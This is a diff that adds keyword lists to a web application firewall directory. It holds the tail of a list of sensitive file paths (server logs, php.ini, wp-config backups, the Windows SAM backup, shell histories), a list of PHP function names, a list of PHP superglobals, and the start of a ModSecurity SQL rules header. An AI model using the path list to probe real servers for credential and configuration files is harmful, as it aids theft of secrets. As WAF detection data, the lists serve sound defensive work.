+wamp/bin/apache/apache2.2.22/conf/wampserver.conf
+wamp/bin/apache/apache2.2.22/logs/access.log
+wamp/bin/apache/apache2.2.22/logs/error.log
+wamp/bin/apache/apache2.2.22/wampserver.conf
+wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index
+wamp/bin/mysql/mysql5.5.16/my.ini
+wamp/bin/mysql/mysql5.5.16/wampserver.conf
+wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index
+wamp/bin/mysql/mysql5.5.24/my.ini
+wamp/bin/mysql/mysql5.5.24/wampserver.conf
+wamp/bin/php/php5.3.8/php.ini
+wamp/bin/php/php5.4.3/php.ini
+wamp/logs/access.log
+wamp/logs/apache_error.log
+wamp/logs/genquery.log
+wamp/logs/mysql.log
+wamp/logs/slowquery.log
+Web.config
+web/conf/php.ini
+webpack.config.js
+windows/comsetup.log
+windows/debug/netsetup.log
+windows/odbc.ini
+windows/php.ini
+windows/repair/setup.log
+windows/setupact.log
+windows/setupapi.log
+windows/setuperr.log
+windows/system32/drivers/etc/hosts
+windows/system32/drivers/etc/lmhosts.sam
+windows/system32/drivers/etc/networks
+windows/system32/drivers/etc/protocol
+windows/system32/drivers/etc/services
+windows/system32/logfiles/firewall/pfirewall.log
+windows/system32/logfiles/firewall/pfirewall.log.old
+windows/system32/logfiles/msftpsvc
+windows/system32/logfiles/msftpsvc1
+windows/system32/logfiles/msftpsvc2
+windows/system32/logfiles/smtpsvc
+windows/system32/logfiles/smtpsvc1
+windows/system32/logfiles/smtpsvc2
+windows/system32/logfiles/smtpsvc3
+windows/system32/logfiles/smtpsvc4
+windows/system32/logfiles/smtpsvc5
+windows/system32/logfiles/w3svc1/inetsvn1.log
+windows/system32/logfiles/w3svc2/inetsvn1.log
+windows/system32/logfiles/w3svc3/inetsvn1.log
+windows/system32/logfiles/w3svc/inetsvn1.log
+windows/system32/macromed/flash/flashinstall.log
+windows/system32/macromed/flash/install.log
+windows/updspapi.log
+windows/windowsupdate.log
+windows/wmsetup.log
+winnt/php.ini
+winnt/repair/sam._
+winnt/system32/logfiles/firewall/pfirewall.log
+winnt/system32/logfiles/firewall/pfirewall.log.old
+winnt/system32/logfiles/msftpsvc
+winnt/system32/logfiles/msftpsvc1
+winnt/system32/logfiles/msftpsvc2
+winnt/system32/logfiles/smtpsvc
+winnt/system32/logfiles/smtpsvc1
+winnt/system32/logfiles/smtpsvc2
+winnt/system32/logfiles/smtpsvc3
+winnt/system32/logfiles/smtpsvc4
+winnt/system32/logfiles/smtpsvc5
+winnt/system32/logfiles/w3svc1/inetsvn1.log
+winnt/system32/logfiles/w3svc2/inetsvn1.log
+winnt/system32/logfiles/w3svc3/inetsvn1.log
+winnt/system32/logfiles/w3svc/inetsvn1.log
+wp-config.bak
+wp-config.old
+wp-config.php
+wp-config.temp
+wp-config.tmp
+wp-config.txt
+www/apache/conf/httpd.conf
+www/conf/httpd.conf
+www/logs/freebsddiary-access_log
+www/logs/freebsddiary-error.log
+www/logs/proftpd.system.log
+xampp/apache/bin/php.ini
+xampp/apache/conf/httpd.conf
+xampp/apache/logs/access.log
+xampp/apache/logs/error.log
+xampp/filezillaftp/filezilla server.xml
+xampp/htdocs/aca.txt
+xampp/htdocs/admin.php
+xampp/htdocs/leer.txt
+xampp/mercurymail/mercury.ini
+xampp/mysql/data/{host}.err
+xampp/mysql/data/mysql-bin.index
+xampp/mysql/data/mysql.err
+xampp/phpmyadmin/config.inc.php
+xampp/php/php.ini
+xampp/sendmail/sendmail.ini
+xampp/sendmail/sendmail.log
+xampp/webalizer/webalizer.conf
+.xauthority
+yarn.lock
+.zhistory
+.zsh_history
+.zshrc
diff --git a/nginx-waf/php_function_names.txt b/nginx-waf/php_function_names.txt
new file mode 100644
index 0000000..6e90fb2
--- /dev/null
+++ b/nginx-waf/php_function_names.txt
@@ -0,0 +1,1263 @@
+__autoload
+addcslashes
+addslashes
+apache_child_terminate
+apache_get_modules
+apache_get_version
+apache_getenv
+apache_lookup_uri
+apache_note
+apache_request_headers
+apache_reset_timeout
+apache_response_headers
+apache_setenv
+array_change_key_case
+array_chunk
+array_column
+array_combine
+array_count_values
+array_diff
+array_diff_assoc
+array_diff_key
+array_fill
+array_fill_keys
+array_flip
+array_intersect
+array_intersect_assoc
+array_intersect_key
+array_key_exists
+array_keys
+array_merge
+array_merge_recursive
+array_multisort
+array_pad
+array_pop
+array_product
+array_push
+array_rand
+array_replace
+array_replace_recursive
+array_reverse
+array_search
+array_shift
+array_slice
+array_splice
+array_sum
+array_unique
+array_unshift
+array_values
+array_walk
+array_walk_recursive
+base_convert
+bin2hex
+bind_textdomain_codeset
+bindtextdomain
+blenc_encrypt
+boolval
+bzclose
+bzcompress
+bzerrno
+bzerror
+bzerrstr
+bzflush
+bzread
+bzwrite
+calcul_hmac
+calculhmac
+chdb_create
+checkdnsrr
+chgrp
+chunk_split
+class_alias
+class_exists
+class_implements
+class_parents
+class_uses
+clearstatcache
+cli_get_process_title
+cli_set_process_title
+com_create_guid
+com_event_sink
+com_get_active_object
+com_load_typelib
+com_message_pump
+com_print_typeinfo
+config_get_hash
+connection_aborted
+connection_status
+convert_cyr_string
+count_chars
+crack_check
+crack_closedict
+crack_getlastmessage
+crack_opendict
+ctype_alnum
+ctype_alpha
+ctype_cntrl
+ctype_digit
+ctype_graph
+ctype_lower
+ctype_print
+ctype_punct
+ctype_space
+ctype_upper
+ctype_xdigit
+curl_close
+curl_copy_handle
+curl_errno
+curl_error
+curl_escape
+curl_getinfo
+curl_multi_add_handle
+curl_multi_close
+curl_multi_exec
+curl_multi_getcontent
+curl_multi_info_read
+curl_multi_init
+curl_multi_remove_handle
+curl_multi_select
+curl_multi_setopt
+curl_multi_strerror
+curl_pause
+curl_reset
+curl_setopt
+curl_setopt_array
+curl_share_close
+curl_share_init
+curl_share_setopt
+curl_strerror
+curl_unescape
+curl_version
+date_add
+date_create
+date_create_from_format
+date_create_immutable
+date_create_immutable_from_format
+date_date_set
+date_default_timezone_get
+date_default_timezone_set
+date_diff
+date_format
+date_get_last_errors
+date_interval_create_from_date_string
+date_interval_format
+date_isodate_set
+date_modify
+date_offset_get
+date_parse
+date_parse_from_format
+date_sub
+date_sun_info
+date_sunrise
+date_sunset
+date_time_set
+date_timestamp_get
+date_timestamp_set
+date_timezone_get
+date_timezone_set
+dcgettext
+dcngettext
+debug_print_backtrace
+debug_zval_dump
+decbin
+dechex
+define_syslog_variables
+deg2rad
+dgettext
+disk_free_space
+disk_total_space
+dngettext
+dns_check_record
+dns_get_mx
+dns_get_record
+dom_import_simplexml
+ereg_replace
+eregi_replace
+error_clear_last
+error_get_last
+expect_expectl
+expect_popen
+expm1
+extension_loaded
+ezmlm_hash
+fastcgi_finish_request
+fflush
+fgetc
+fgetcsv
+fgetss
+filter_has_var
+filter_id
+filter_input
+filter_input_array
+filter_list
+filter_var
+filter_var_array
+finfo_close
+fnmatch
+foreach
+forward_static_call
+forward_static_call_array
+fpassthru
+fprintf
+fputcsv
+frenchtojd
+fribidi_log2vis
+fscanf
+fseek
+ftp_ssl_connect
+ftruncate
+func_get_arg
+func_get_args
+func_num_args
+gc_collect_cycles
+gc_disable
+gc_enable
+gc_enabled
+gc_mem_caches
+gd_info
+get_browser
+get_called_class
+get_class
+get_declared_classes
+get_declared_interfaces
+get_declared_traits
+get_extension_funcs
+get_headers
+get_html_translation_table
+get_include_path
+get_included_files
+get_loaded_extensions
+get_magic_quotes_gpc
+get_magic_quotes_runtime
+get_object_vars
+get_parent_class
+get_required_files
+get_resource_type
+get_resources
+getallheaders
+gethostbyaddr
+gethostbyname
+gethostbynamel
+gethostname
+getimagesizefromstring
+getmxrr
+getopt
+getprotobyname
+getprotobynumber
+getrandmax
+getrusage
+getservbyname
+getservbyport
+gettimeofday
+gmmktime
+gmstrftime
+gopher_parsedir
+gregoriantojd
+gzclose
+gzeof
+gzgetc
+gzgets
+gzgetss
+gzpassthru
+gzputs
+gzrewind
+gzseek
+gztell
+hash_algos
+hash_copy
+hash_equals
+hash_final
+hash_hmac
+hash_init
+hash_pbkdf2
+hash_update
+hash_update_stream
+header_remove
+hebrevc
+hexdec
+highlight_string
+http_build_query
+http_response_code
+iconv_get_encoding
+iconv_mime_decode
+iconv_mime_decode_headers
+iconv_mime_encode
+iconv_set_encoding
+iconv_strlen
+iconv_strpos
+iconv_strrpos
+iconv_substr
+idn_to_ascii
+idn_to_utf8
+ignore_user_abort
+image_type_to_extension
+image_type_to_mime_type
+import_request_variables
+in_array
+inet_ntop
+inet_pton
+ini_alter
+ini_restore
+interface_exists
+intl_error_name
+intl_get_error_code
+intl_get_error_message
+intl_is_failure
+ip2long
+iptcembed
+iptcparse
+is_subclass_of
+is_uploaded_file
+iterator_apply
+iterator_count
+iterator_to_array
+jddayofweek
+jdmonthname
+jdtofrench
+jdtogregorian
+jdtojewish
+jdtojulian
+jdtounix
+jewishtojd
+jpeg2wbmp
+json_last_error
+json_last_error_msg
+judy_type
+judy_version
+juliantojd
+key_exists
+krsort
+lcg_value
+lchgrp
+lchown
+libxml_clear_errors
+libxml_disable_entity_loader
+libxml_get_errors
+libxml_get_last_error
+libxml_set_external_entity_loader
+libxml_set_streams_context
+libxml_use_internal_errors
+localeconv
+long2ip
+lzf_compress
+lzf_decompress
+lzf_optimized_for
+magic_quotes_runtime
+mb_check_encoding
+mb_convert_case
+mb_convert_encoding
+mb_convert_kana
+mb_convert_variables
+mb_decode_mimeheader
+mb_decode_numericentity
+mb_detect_encoding
+mb_detect_order
+mb_encode_mimeheader
+mb_encode_numericentity
+mb_encoding_aliases
+mb_ereg_search
+mb_ereg_search_getpos
+mb_ereg_search_getregs
+mb_ereg_search_init
+mb_ereg_search_pos
+mb_ereg_search_regs
+mb_ereg_search_setpos
+mb_get_info
+mb_http_input
+mb_http_output
+mb_internal_encoding
+mb_language
+mb_list_encodings
+mb_output_handler
+mb_preferred_mime_name
+mb_regex_encoding
+mb_regex_set_options
+mb_send_mail
+mb_split
+mb_strcut
+mb_strimwidth
+mb_stripos
+mb_stristr
+mb_strlen
+mb_strpos
+mb_strrchr
+mb_strrichr
+mb_strripos
+mb_strrpos
+mb_strstr
+mb_strtolower
+mb_strtoupper
+mb_strwidth
+mb_substitute_character
+mb_substr
+mb_substr_count
+mbereg_match
+mbereg_replace
+mbereg_search
+mbereg_search_getpos
+mbereg_search_getregs
+mbereg_search_init
+mbereg_search_pos
+mbereg_search_regs
+mbereg_search_setpos
+mberegi
+mberegi_replace
+mbregex_encoding
+mcrypt_cbc
+mcrypt_cfb
+mcrypt_create_iv
+mcrypt_decrypt
+mcrypt_ecb
+mcrypt_enc_get_algorithms_name
+mcrypt_enc_get_block_size
+mcrypt_enc_get_iv_size
+mcrypt_enc_get_key_size
+mcrypt_enc_get_modes_name
+mcrypt_enc_get_supported_key_sizes
+mcrypt_enc_is_block_algorithm
+mcrypt_enc_is_block_algorithm_mode
+mcrypt_enc_is_block_mode
+mcrypt_enc_self_test
+mcrypt_encrypt
+mcrypt_generic
+mcrypt_generic_deinit
+mcrypt_generic_end
+mcrypt_generic_init
+mcrypt_get_block_size
+mcrypt_get_cipher_name
+mcrypt_get_iv_size
+mcrypt_get_key_size
+mcrypt_list_algorithms
+mcrypt_list_modes
+mcrypt_module_close
+mcrypt_module_get_algo_block_size
+mcrypt_module_get_algo_key_size
+mcrypt_module_get_supported_key_sizes
+mcrypt_module_is_block_algorithm
+mcrypt_module_is_block_algorithm_mode
+mcrypt_module_is_block_mode
+mcrypt_module_open
+mcrypt_module_self_test
+mcrypt_ofb
+mdecrypt_generic
+memcache_debug
+memory_get_peak_usage
+memory_get_usage
+mhash_count
+mhash_get_block_size
+mhash_get_hash_name
+mhash_keygen_s2k
+mime_content_type
+mktime
+money_format
+msg_get_queue
+msg_queue_exists
+msg_receive
+msg_remove_queue
+msg_send
+msg_set_queue
+msg_stat_queue
+mssql_bind
+mssql_close
+mssql_connect
+mssql_data_seek
+mssql_execute
+mssql_fetch_array
+mssql_fetch_assoc
+mssql_fetch_batch
+mssql_fetch_field
+mssql_fetch_object
+mssql_fetch_row
+mssql_field_length
+mssql_field_name
+mssql_field_seek
+mssql_field_type
+mssql_free_result
+mssql_free_statement
+mssql_get_last_message
+mssql_guid_string
+mssql_init
+mssql_min_error_severity
+mssql_min_message_severity
+mssql_next_result
+mssql_num_fields
+mssql_num_rows
+mssql_pconnect
+mssql_query
+mssql_result
+mssql_rows_affected
+mssql_select_db
+mt_getrandmax
+mt_rand
+mt_srand
+mysql_affected_rows
+mysql_client_encoding
+mysql_close
+mysql_connect
+mysql_create_db
+mysql_createdb
+mysql_data_seek
+mysql_db_name
+mysql_db_query
+mysql_dbname
+mysql_drop_db
+mysql_dropdb
+mysql_errno
+mysql_error
+mysql_escape_string
+mysql_fetch_array
+mysql_fetch_assoc
+mysql_fetch_field
+mysql_fetch_lengths
+mysql_fetch_object
+mysql_fetch_row
+mysql_field_flags
+mysql_field_len
+mysql_field_name
+mysql_field_seek
+mysql_field_table
+mysql_field_type
+mysql_fieldflags
+mysql_fieldlen
+mysql_fieldname
+mysql_fieldtable
+mysql_fieldtype
+mysql_free_result
+mysql_freeresult
+mysql_get_client_info
+mysql_get_host_info
+mysql_get_proto_info
+mysql_get_server_info
+mysql_info
+mysql_insert_id
+mysql_list_dbs
+mysql_list_fields
+mysql_list_processes
+mysql_list_tables
+mysql_listdbs
+mysql_listfields
+mysql_listtables
+mysql_num_fields
+mysql_num_rows
+mysql_numfields
+mysql_numrows
+mysql_pconnect
+mysql_ping
+mysql_real_escape_string
+mysql_result
+mysql_select_db
+mysql_selectdb
+mysql_set_charset
+mysql_stat
+mysql_table_name
+mysql_tablename
+mysql_thread_id
+mysql_unbuffered_query
+mysqli_bind_param
+mysqli_bind_result
+mysqli_client_encoding
+mysqli_connect
+mysqli_disable_rpl_parse
+mysqli_enable_reads_from_master
+mysqli_enable_rpl_parse
+mysqli_escape_string
+mysqli_execute
+mysqli_fetch
+mysqli_get_cache_stats
+mysqli_get_client_stats
+mysqli_get_client_version
+mysqli_get_links_stats
+mysqli_get_metadata
+mysqli_master_query
+mysqli_param_count
+mysqli_report
+mysqli_rpl_parse_enabled
+mysqli_rpl_probe
+mysqli_send_long_data
+mysqli_slave_query
+mysqlnd_memcache_get_config
+mysqlnd_memcache_set
+mysqlnd_ms_dump_servers
+mysqlnd_ms_fabric_select_global
+mysqlnd_ms_fabric_select_shard
+mysqlnd_ms_get_last_gtid
+mysqlnd_ms_get_last_used_connection
+mysqlnd_ms_get_stats
+mysqlnd_ms_match_wild
+mysqlnd_ms_query_is_select
+mysqlnd_ms_set_qos
+mysqlnd_ms_set_user_pick_server
+mysqlnd_ms_xa_begin
+mysqlnd_ms_xa_commit
+mysqlnd_ms_xa_gc
+mysqlnd_ms_xa_rollback
+mysqlnd_qc_clear_cache
+mysqlnd_qc_get_available_handlers
+mysqlnd_qc_get_cache_info
+mysqlnd_qc_get_core_stats
+mysqlnd_qc_get_normalized_query_trace_log
+mysqlnd_qc_get_query_trace_log
+mysqlnd_qc_set_cache_condition
+mysqlnd_qc_set_is_select
+mysqlnd_qc_set_storage_handler
+mysqlnd_qc_set_user_handlers
+mysqlnd_uh_convert_to_mysqlnd
+mysqlnd_uh_set_connection_proxy
+mysqlnd_uh_set_statement_proxy
+natcasesort
+ngettext
+nl2br
+nl_langinfo
+nsapi_request_headers
+nsapi_response_headers
+nsapi_virtual
+nthmac
+number_format
+oauth_get_sbs
+oauth_urlencode
+ob_get_length
+ob_get_level
+ob_get_status
+ob_gzhandler
+ob_iconv_handler
+ob_implicit_flush
+ob_list_handlers
+ob_tidyhandler
+odbc_autocommit
+odbc_binmode
+odbc_close
+odbc_close_all
+odbc_columnprivileges
+odbc_columns
+odbc_commit
+odbc_cursor
+odbc_data_source
+odbc_do
+odbc_error
+odbc_errormsg
+odbc_fetch_array
+odbc_fetch_into
+odbc_fetch_object
+odbc_fetch_row
+odbc_field_len
+odbc_field_name
+odbc_field_num
+odbc_field_precision
+odbc_field_scale
+odbc_field_type
+odbc_foreignkeys
+odbc_free_result
+odbc_gettypeinfo
+odbc_longreadlen
+odbc_next_result
+odbc_num_fields
+odbc_num_rows
+odbc_pconnect
+odbc_prepare
+odbc_primarykeys
+odbc_procedurecolumns
+odbc_procedures
+odbc_rollback
+odbc_setoption
+odbc_specialcolumns
+odbc_statistics
+odbc_tableprivileges
+odbc_tables
+opcache_compile_file
+opcache_get_configuration
+opcache_get_status
+opcache_invalidate
+opcache_is_script_cached
+opcache_reset
+openssl_cipher_iv_length
+openssl_csr_export
+openssl_csr_export_to_file
+openssl_csr_get_public_key
+openssl_csr_get_subject
+openssl_csr_new
+openssl_csr_sign
+openssl_decrypt
+openssl_dh_compute_key
+openssl_digest
+openssl_encrypt
+openssl_error_string
+openssl_free_key
+openssl_get_cert_locations
+openssl_get_cipher_methods
+openssl_get_md_methods
+openssl_get_privatekey
+openssl_get_publickey
+openssl_open
+openssl_pbkdf2
+openssl_pkcs12_export
+openssl_pkcs12_export_to_file
+openssl_pkcs12_read
+openssl_pkcs7_decrypt
+openssl_pkcs7_encrypt
+openssl_pkcs7_sign
+openssl_pkcs7_verify
+openssl_pkey_export
+openssl_pkey_export_to_file
+openssl_pkey_free
+openssl_pkey_get_details
+openssl_pkey_get_private
+openssl_pkey_get_public
+openssl_pkey_new
+openssl_private_decrypt
+openssl_private_encrypt
+openssl_public_decrypt
+openssl_public_encrypt
+openssl_random_pseudo_bytes
+openssl_seal
+openssl_sign
+openssl_spki_export
+openssl_spki_export_challenge
+openssl_spki_new
+openssl_spki_verify
+openssl_verify
+openssl_x509_check_private_key
+openssl_x509_checkpurpose
+openssl_x509_export
+openssl_x509_export_to_file
+openssl_x509_fingerprint
+openssl_x509_free
+openssl_x509_parse
+openssl_x509_read
+output_add_rewrite_var
+output_reset_rewrite_vars
+override_function
+parse_ini_string
+parse_url
+parsekit_compile_file
+parsekit_compile_string
+parsekit_func_arginfo
+password_get_info
+password_hash
+password_needs_rehash
+password_verify
+pcntl_alarm
+pcntl_errno
+pcntl_get_last_error
+pcntl_getpriority
+pcntl_setpriority
+pcntl_signal
+pcntl_signal_dispatch
+pcntl_sigprocmask
+pcntl_sigtimedwait
+pcntl_sigwaitinfo
+pcntl_strerror
+pcntl_wait
+pcntl_waitpid
+pcntl_wexitstatus
+pcntl_wifexited
+pcntl_wifsignaled
+pcntl_wifstopped
+pcntl_wstopsig
+pcntl_wtermsig
+pg_affected_rows
+pg_cancel_query
+pg_client_encoding
+pg_close
+pg_connect_poll
+pg_connection_busy
+pg_connection_reset
+pg_connection_status
+pg_consume_input
+pg_convert
+pg_copy_from
+pg_copy_to
+pg_dbname
+pg_delete
+pg_end_copy
+pg_escape_bytea
+pg_escape_identifier
+pg_escape_literal
+pg_escape_string
+pg_fetch_all
+pg_fetch_all_columns
+pg_fetch_array
+pg_fetch_assoc
+pg_fetch_object
+pg_fetch_result
+pg_fetch_row
+pg_field_is_null
+pg_field_name
+pg_field_num
+pg_field_prtlen
+pg_field_size
+pg_field_table
+pg_field_type
+pg_field_type_oid
+pg_flush
+pg_free_result
+pg_get_notify
+pg_get_pid
+pg_get_result
+pg_host
+pg_insert
+pg_last_error
+pg_last_notice
+pg_last_oid
+pg_lo_close
+pg_lo_create
+pg_lo_export
+pg_lo_import
+pg_lo_open
+pg_lo_read
+pg_lo_read_all
+pg_lo_seek
+pg_lo_tell
+pg_lo_truncate
+pg_lo_unlink
+pg_lo_write
+pg_meta_data
+pg_num_fields
+pg_num_rows
+pg_options
+pg_parameter_status
+pg_pconnect
+pg_ping
+pg_port
+pg_put_line
+pg_query_params
+pg_result_error
+pg_result_error_field
+pg_result_seek
+pg_result_status
+pg_select
+pg_send_execute
+pg_send_prepare
+pg_send_query
+pg_send_query_params
+pg_set_client_encoding
+pg_set_error_verbosity
+pg_socket
+pg_trace
+pg_transaction_status
+pg_tty
+pg_unescape_bytea
+pg_untrace
+pg_update
+pg_version
+php_check_syntax
+php_ini_loaded_file
+php_ini_scanned_files
+php_logo_guid
+php_sapi_name
+phpcredits
+png2wbmp
+posix_access
+posix_ctermid
+posix_errno
+posix_get_last_error
+posix_getgrgid
+posix_getgrnam
+posix_getgroups
+posix_getpgid
+posix_getpgrp
+posix_getpid
+posix_getppid
+posix_getrlimit
+posix_getsid
+posix_initgroups
+posix_isatty
+posix_setegid
+posix_seteuid
+posix_setgid
+posix_setpgid
+posix_setrlimit
+posix_setsid
+posix_setuid
+posix_strerror
+posix_times
+preg_filter
+preg_grep
+preg_last_error
+preg_quote
+property_exists
+quoted_printable_decode
+quoted_printable_encode
+rad2deg
+random_bytes
+random_int
+rar_wrapper_cache_stats
+readline_add_history
+readline_callback_handler_install
+readline_callback_handler_remove
+readline_callback_read_char
+readline_clear_history
+readline_completion_function
+readline_info
+readline_list_history
+readline_on_new_line
+readline_read_history
+readline_redisplay
+readline_write_history
+realpath
+realpath_cache_get
+realpath_cache_size
+recode_file
+recode_string
+restore_error_handler
+restore_exception_handler
+restore_include_path
+rewinddir
+rmdir
+rpm_close
+rpm_get_tag
+rpm_is_valid
+rpm_open
+rpm_version
+rrdc_disconnect
+runkit_class_adopt
+runkit_class_emancipate
+runkit_constant_remove
+runkit_function_remove
+runkit_import
+runkit_lint
+runkit_lint_file
+runkit_method_remove
+runkit_return_value_used
+runkit_sandbox_output_handler
+runkit_superglobals
+sem_acquire
+sem_get
+sem_release
+sem_remove
+session_abort
+session_cache_expire
+session_cache_limiter
+session_commit
+session_decode
+session_destroy
+session_encode
+session_get_cookie_params
+session_is_registered
+session_module_name
+session_name
+session_pgsql_add_error
+session_pgsql_get_error
+session_pgsql_get_field
+session_pgsql_reset
+session_pgsql_set_field
+session_pgsql_status
+session_regenerate_id
+session_register
+session_register_shutdown
+session_reset
+session_save_path
+session_set_cookie_params
+session_status
+session_unregister
+session_unset
+session_write_close
+set_file_buffer
+set_socket_blocking
+set_time_limit
+setcookie
+setlocale
+setproctitle
+setrawcookie
+setthreadtitle
+shm_attach
+shm_detach
+shm_get_var
+shm_has_var
+shm_put_var
+shm_remove
+shm_remove_var
+shmop_close
+shmop_delete
+shmop_open
+shmop_read
+shmop_size
+shmop_write
+simplexml_import_dom
+socket_accept
+socket_bind
+socket_clear_error
+socket_close
+socket_cmsg_space
+socket_create_listen
+socket_create_pair
+socket_get_option
+socket_get_status
+socket_getopt
+socket_getpeername
+socket_getsockname
+socket_import_stream
+socket_last_error
+socket_listen
+socket_read
+socket_recv
+socket_recvfrom
+socket_recvmsg
+socket_select
+socket_send
+socket_sendmsg
+socket_sendto
+socket_set_block
+socket_set_blocking
+socket_set_nonblock
+socket_set_option
+socket_set_timeout
+socket_setopt
+socket_shutdown
+socket_strerror
+socket_write
+solr_get_version
+spl_autoload
+spl_autoload_call
+spl_autoload_extensions
+spl_autoload_functions
+spl_autoload_register
+spl_autoload_unregister
+spl_classes
+spl_object_hash
+sql_regcase
+sqlite_busy_timeout
+sqlite_changes
+sqlite_close
+sqlite_column
+sqlite_current
+sqlite_error_string
+sqlite_escape_string
+sqlite_factory
+sqlite_fetch_all
+sqlite_fetch_array
+sqlite_fetch_column_types
+sqlite_fetch_object
+sqlite_fetch_single
+sqlite_fetch_string
+sqlite_field_name
+sqlite_has_more
+sqlite_has_prev
+sqlite_key
+sqlite_last_error
+sqlite_last_insert_rowid
+sqlite_libencoding
+sqlite_libversion
+sqlite_next
+sqlite_num_fields
+sqlite_num_rows
+sqlite_prev
+sqlite_rewind
+sqlite_seek
+sqlite_udf_decode_binary
+sqlite_udf_encode_binary
+sqlite_valid
+sqlsrv_begin_transaction
+sqlsrv_cancel
+sqlsrv_client_info
+sqlsrv_close
+sqlsrv_commit
+sqlsrv_configure
+sqlsrv_connect
+sqlsrv_errors
+sqlsrv_execute
+sqlsrv_fetch
+sqlsrv_fetch_array
+sqlsrv_fetch_object
+sqlsrv_field_metadata
+sqlsrv_free_stmt
+sqlsrv_get_config
+sqlsrv_get_field
+sqlsrv_has_rows
+sqlsrv_next_result
+sqlsrv_num_fields
+sqlsrv_num_rows
+sqlsrv_prepare
+sqlsrv_query
+sqlsrv_rollback
+sqlsrv_rows_affected
+sqlsrv_send_stream_data
+sqlsrv_server_info
+sscanf
+ssdeep_fuzzy_compare
+ssdeep_fuzzy_hash
+ssdeep_fuzzy_hash_filename
+stomp_connect_error
+stomp_version
+str_getcsv
+str_ireplace
+str_pad
+str_repeat
+str_replace
+str_shuffle
+str_split
+str_word_count
+strcasecmp
+strchr
+strcmp
+strcspn
+stream_bucket_append
+stream_bucket_make_writeable
+stream_bucket_new
+stream_bucket_prepend
+stream_context_get_default
+stream_context_get_options
+stream_context_get_params
+stream_context_set_default
+stream_context_set_option
+stream_context_set_params
+stream_copy_to_stream
+stream_encoding
+stream_filter_append
+stream_filter_prepend
+stream_filter_register
+stream_filter_remove
+stream_get_contents
+stream_get_filters
+stream_get_line
+stream_get_meta_data
+stream_get_transports
+stream_get_wrappers
+stream_is_local
+stream_notification_callback
+stream_register_wrapper
+stream_resolve_include_path
+stream_select
+stream_set_blocking
+stream_set_chunk_size
+stream_set_read_buffer
+stream_set_timeout
+stream_set_write_buffer
+stream_socket_accept
+stream_socket_enable_crypto
+stream_socket_get_name
+stream_socket_pair
+stream_socket_recvfrom
+stream_socket_sendto
+stream_socket_server
+stream_socket_shutdown
+stream_supports_lock
+stream_wrapper_register
+stream_wrapper_restore
+stream_wrapper_unregister
+strftime
+strip_tags
+stripos
+stristr
+strnatcasecmp
+strnatcmp
+strncasecmp
+strncmp
+strpbrk
+strpos
+strptime
+strrchr
+strripos
+strrpos
+strstr
+strtok
+strtolower
+strtotime
+strtoupper
+strtr
+strval
+substr_compare
+substr_count
+substr_replace
+sys_getloadavg
+tcpwrap_check
+time_nanosleep
+time_sleep_until
+timezone_abbreviations_list
+timezone_identifiers_list
+timezone_location_get
+timezone_name_from_abbr
+timezone_name_get
+timezone_offset_get
+timezone_open
+timezone_transitions_get
+timezone_version_get
+token_get_all
+token_name
+trait_exists
+trigger_error
+ucwords
+unixtojd
+unregister_tick_function
+use_soap_error_handler
+user_error
+utf8_decode
+utf8_encode
+var_export
+version_compare
+vfprintf
+vprintf
+vsprintf
+win32_continue_service
+win32_create_service
+win32_delete_service
+win32_get_last_control_message
+win32_pause_service
+win32_ps_list_procs
+win32_ps_stat_mem
+win32_ps_stat_proc
+win32_query_service_status
+win32_set_service_status
+win32_start_service
+win32_start_service_ctrl_dispatcher
+win32_stop_service
+xattr_get
+xattr_list
+xattr_remove
+xattr_set
+xattr_supported
+xml_error_string
+xml_get_current_byte_index
+xml_get_current_column_number
+xml_get_current_line_number
+xml_get_error_code
+xml_parse
+xml_parse_into_struct
+xml_parser_create
+xml_parser_create_ns
+xml_parser_free
+xml_parser_get_option
+xml_parser_set_option
+xml_set_character_data_handler
+xml_set_default_handler
+xml_set_element_handler
+xml_set_end_namespace_decl_handler
+xml_set_external_entity_ref_handler
+xml_set_notation_decl_handler
+xml_set_object
+xml_set_processing_instruction_handler
+xml_set_start_namespace_decl_handler
+xml_set_unparsed_entity_decl_handler
+xmlrpc_decode
+xmlrpc_decode_request
+xmlrpc_encode
+xmlrpc_encode_request
+xmlrpc_get_type
+xmlrpc_is_fault
+xmlrpc_parse_method_descriptions
+xmlrpc_server_add_introspection_data
+xmlrpc_server_call_method
+xmlrpc_server_create
+xmlrpc_server_destroy
+xmlrpc_server_register_introspection_callback
+xmlrpc_server_register_method
+xmlrpc_set_type
+yaml_emit
+yaml_emit_file
+yaml_parse
+yaml_parse_file
+yaml_parse_url
+zend_logo_guid
+zend_thread_id
+zend_version
+zip_close
+zip_entry_close
+zip_entry_compressedsize
+zip_entry_compressionmethod
+zip_entry_filesize
+zip_entry_name
+zip_entry_open
+zip_entry_read
+zip_open
+zip_read
+zlib_encode
+zlib_get_coding_type
diff --git a/nginx-waf/php_variables.txt b/nginx-waf/php_variables.txt
new file mode 100644
index 0000000..cb3aaee
--- /dev/null
+++ b/nginx-waf/php_variables.txt
@@ -0,0 +1,19 @@
+$argc
+$argv
+$_COOKIE
+$_ENV
+$_FILES
+$_GET
+$GLOBALS
+$HTTP_COOKIE_VARS
+$HTTP_ENV_VARS
+$HTTP_GET_VARS
+$HTTP_POST_FILES
+$HTTP_POST_VARS
+$HTTP_RAW_POST_DATA
+$HTTP_REQUEST_VARS
+$HTTP_SERVER_VARS
+$_POST
+$_REQUEST
+$_SERVER
+$_SESSION
diff --git a/nginx-waf/sql.txt b/nginx-waf/sql.txt
new file mode 100644
index 0000000..fc7d698
--- /dev/null
+++ b/nginx-waf/sql.txt
@@ -0,0 +1,108 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
